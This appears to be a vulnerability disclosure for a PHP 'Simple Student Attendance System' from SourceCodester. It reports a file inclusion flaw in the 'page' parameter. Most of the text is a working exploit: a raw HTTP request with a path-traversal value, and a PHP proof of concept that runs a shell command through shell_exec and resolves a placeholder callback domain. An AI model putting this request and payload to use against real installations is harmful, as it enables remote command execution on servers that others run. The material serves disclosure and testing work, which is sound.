Source code download：https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html

version：2023/11/30
vulnerability details :
Foreground files contain arbitrary files that cause commands to execute, and an attacker can include arbitrary files by modifying the $_GET <$'page '] parameter. 
Data packets: 
GET /php-attendance/?page=../../1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: comment_author_email_bbfa5b726c6b7a9cf3cda9370be3ee91=12311212@1.com; comment_author_bbfa5b726c6b7a9cf3cda9370be3ee91=qaeqe1; comment_author_url_bbfa5b726c6b7a9cf3cda9370be3ee91=http://12; CookiePreferences-localhost/wordpress-6.3.1/wordpress={"settings":{"technical":true,"statistics":false,"profiling":false},"ref":"1696654015217","first_ref":1696653102503,"ver":"2.0.0"}; PHPSESSID=pp2ukln8drgoedeappc1mqb0kv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
POC：
<?php
$domain = "{interact}";
$ip = gethostbyname($domain);
$command = "calc";
$output = shell_exec($command);
echo "<pre>$output</pre>";
?>
